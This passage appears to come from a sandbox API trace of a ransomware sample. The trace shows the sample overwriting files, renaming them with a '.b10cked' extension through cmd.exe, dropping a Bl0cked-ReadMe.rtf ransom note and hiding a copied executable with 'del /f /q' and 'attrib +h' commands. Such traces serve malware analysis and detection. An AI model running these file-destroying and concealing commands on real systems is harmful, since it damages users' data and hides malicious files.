lpOverlapped=0x0) returned 1 [0200.038] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x21d0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x21d0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0200.039] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x10e7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x10e7, lpOverlapped=0x0) returned 1 [0200.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0200.040] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x10e7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x10e7, lpOverlapped=0x0) returned 1 [0200.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=-4327, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x10e9 [0200.040] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x10e7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x10e7, lpOverlapped=0x0) returned 1 [0200.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=-4327, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x10e9 [0200.040] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x10e7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x10e7, lpOverlapped=0x0) returned 1 [0200.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nslist.hxl", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0200.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nslist.hxl", cchWideChar=10, lpMultiByteStr=0x131322c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nslist.hxl", lpUsedDefaultChar=0x0) returned 10 [0200.045] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x21d0 [0200.045] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0200.045] CloseHandle (hObject=0x120) returned 1 [0200.046] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl") returned 0x25 [0200.047] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0200.047] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf64, dwThreadId=0xecc)) returned 1 [0200.123] CloseHandle (hObject=0x1b4) returned 1 [0200.123] CloseHandle (hObject=0x120) returned 1 [0200.123] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0200.123] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0200.123] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0200.123] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.123] ReleaseMutex (hMutex=0xf8) returned 1 [0200.123] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.123] ReleaseMutex (hMutex=0xf8) returned 1 [0200.123] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.123] ReleaseMutex (hMutex=0xf8) returned 1 [0200.123] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.123] ReleaseMutex (hMutex=0xf8) returned 1 [0200.124] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.127] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25691598098) returned 1 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x272 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x272 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0200.129] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0200.129] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0200.129] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x272 [0200.129] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0200.129] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0200.129] ReadFile (in: hFile=0x120, lpBuffer=0x14a8f78, nNumberOfBytesToRead=0x138, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14a8f78*, lpNumberOfBytesRead=0x12ec08*=0x138, lpOverlapped=0x0) returned 1 [0200.130] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0200.130] WriteFile (in: hFile=0x120, lpBuffer=0x14a8f78*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14a8f78*, lpNumberOfBytesWritten=0x12ec1c*=0x138, lpOverlapped=0x0) returned 1 [0200.130] SetFilePointer (in: hFile=0x120, lDistanceToMove=-312, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x13a [0200.130] ReadFile (in: hFile=0x120, lpBuffer=0x14a8f78, nNumberOfBytesToRead=0x138, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14a8f78*, lpNumberOfBytesRead=0x12ec08*=0x138, lpOverlapped=0x0) returned 1 [0200.130] SetFilePointer (in: hFile=0x120, lDistanceToMove=-312, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x13a [0200.130] WriteFile (in: hFile=0x120, lpBuffer=0x14a8f78*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14a8f78*, lpNumberOfBytesWritten=0x12ec1c*=0x138, lpOverlapped=0x0) returned 1 [0200.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x131324c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0200.135] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x272 [0200.135] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0200.136] CloseHandle (hObject=0x120) returned 1 [0200.137] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm") returned 0x2d [0200.137] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\") returned 0x24 [0200.138] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd30, dwThreadId=0xfc8)) returned 1 [0200.149] CloseHandle (hObject=0x1b4) returned 1 [0200.149] CloseHandle (hObject=0x120) returned 1 [0200.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0200.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0200.149] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\", cchCount1=72, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 3 [0200.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0200.149] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0200.149] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0200.149] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0200.149] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0200.149] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0200.149] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\") returned 0x24 [0200.150] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0200.150] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0200.150] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xef0, dwThreadId=0xe1c)) returned 1 [0200.155] CloseHandle (hObject=0x1b4) returned 1 [0200.155] CloseHandle (hObject=0x120) returned 1 [0200.156] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\bl0cked-readme.rtf")) returned 0xffffffff [0200.156] GetLastError () returned 0x2 [0200.156] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0200.254] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\bl0cked-readme.rtf")) returned 0x20 [0200.254] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0200.254] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0200.254] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0200.254] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0200.254] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0200.254] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0200.254] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0200.254] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\") returned 0x24 [0200.255] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type 